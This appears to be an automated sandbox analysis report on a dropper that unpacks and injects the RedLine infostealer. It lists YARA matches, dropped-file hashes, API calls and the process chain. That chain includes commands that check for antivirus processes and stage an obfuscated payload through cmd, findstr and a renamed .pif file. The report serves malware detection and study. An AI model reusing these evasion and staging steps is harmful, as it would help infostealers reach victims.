Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_0098265E	10_2_0098265E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_0097282A	10_2_0097282A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009889BF	10_2_009889BF
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009D0A3A	10_2_009D0A3A
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_00986A74	10_2_00986A74
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_00960BE0	10_2_00960BE0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009AEDB2	10_2_009AEDB2
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_0097CD51	10_2_0097CD51
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009D0EB7	10_2_009D0EB7
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009B8E44	10_2_009B8E44
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_00986FE6	10_2_00986FE6
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009733B7	10_2_009733B7
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_0097F409	10_2_0097F409
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_0096D45D	10_2_0096D45D
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009716B4	10_2_009716B4
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_0095F6A0	10_2_0095F6A0
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_0096F628	10_2_0096F628
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_00951663	10_2_00951663
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009778C3	10_2_009778C3
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_0097DBA5	10_2_0097DBA5
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_00971BA8	10_2_00971BA8
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_0096DD28	10_2_0096DD28
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_0097BFD6	10_2_0097BFD6
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_00971FC0	10_2_00971FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Code function: 19_2_013EF608	19_2_013EF608

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\xBCzEiVyOcVH.dll 28AB9A0F5F50FD5398324B5EC099F5C53C6FAA701C3F6D8B0B3DA47A76C56230

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: String function: 00961A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: String function: 00970D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: String function: 00978B30 appears 42 times

Source: xBCzEiVyOcVH.dll.10.dr

Static PE information: Resource name: RT_MESSAGETABLE type: PDP-11 separate I&D executable not stripped

Source: xBCzEiVyOcVH.dll.10.dr

Static PE information: No import functions for PE file found

Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe, 00000000.00000000.1163476792.000000000041C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSbieSupport.dllj% vs SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe
Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe, 00000000.00000002.1230068469.00000000047B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSbieSupport.dllj% vs SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe
Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Binary or memory string: OriginalFilenameSbieSupport.dllj% vs SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 19.2.jsc.exe.be0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 19.2.jsc.exe.be0000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 19.2.jsc.exe.be0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000A.00000003.1743982842.0000000003E18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 0000000A.00000003.1743078453.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 0000000A.00000003.1743286969.0000000003E38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 0000000A.00000003.1680425989.00000000050F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 00000013.00000002.2411191854.0000000000BE2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
Source: 0000000A.00000003.1744137942.0000000003DF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12

Source: xBCzEiVyOcVH.dll.10.dr

Binary string: \Device\IPT[

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@24/6@1/1

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

Code function: 0_2_00407C28 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,

0_2_00407C28

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009A8DE9 AdjustTokenPrivileges,CloseHandle,		10_2_009A8DE9
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Code function: 10_2_009A9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		10_2_009A9399

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_009BB976 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

10_2_009BB976

Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif

Code function: 10_2_009B4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

10_2_009B4148

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

Code function: 0_2_00403663 _wtol,_wtol,SHGetSpecialFolderPathW,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,

0_2_00403663

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

Code function: 0_2_0040683D memcpy,SystemParametersInfoW,GetDC,GetDeviceCaps,MulDiv,ReleaseDC,GetModuleHandleW,FindResourceA,LoadResource,LockResource,DialogBoxIndirectParamW,

0_2_0040683D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: user32.dll	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: user32.dll	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: sfxtest	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: sfxconfig	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: SfxString%d	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: SetEnvironment	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: SetEnvironment	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: SetEnvironment	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: HelpText	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: InstallPath	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: BeginPrompt	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: AutoInstall	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: AutoInstall	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: ExecuteFile	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: ExecuteFile	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: ExecuteFile	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: RunProgram	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: RunProgram	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: RunProgram	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: 7ZipSfx.%03x	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: setup.exe	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: setup.exe	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: setup.exe	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: Shortcut	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: Delete	0_2_00404AEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Command line argument: SelfDelete	0_2_00404AEB

Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'BULLGUARDCORE.EXE'
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'PSUASERVICE.EXE'

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Virustotal: Detection: 71%
Source: SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd < Bel.tmp
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq BullGuardCore.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /I /N "bullguardcore.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq PSUAService.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /I /N "psuaservice.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^BMFIocnwPbapedepYbhWqofGZurIuQVJxjUhlGSmSVBHSStsfyboyoBzbYJwaQVYCIOPvPZsEOttGIOueLaqzNEjKBPjXRuwqCtptgVmuyDdrvMPlCYGbU$" Dici.tmp
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif Rarissima.exe.pif u
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\waitfor.exe waitfor /t 5 cPJmppTIOgHphOgIZlJIVQpIXRsFPuungjFRADw
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd < Bel.tmp	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq BullGuardCore.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /I /N "bullguardcore.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "imagename eq PSUAService.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find /I /N "psuaservice.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^BMFIocnwPbapedepYbhWqofGZurIuQVJxjUhlGSmSVBHSStsfyboyoBzbYJwaQVYCIOPvPZsEOttGIOueLaqzNEjKBPjXRuwqCtptgVmuyDdrvMPlCYGbU$" Dici.tmp	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif Rarissima.exe.pif u	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\waitfor.exe waitfor /t 5 cPJmppTIOgHphOgIZlJIVQpIXRsFPuungjFRADw	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Rarissima.exe.pif	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop19.61354.18603.9865.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\find.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
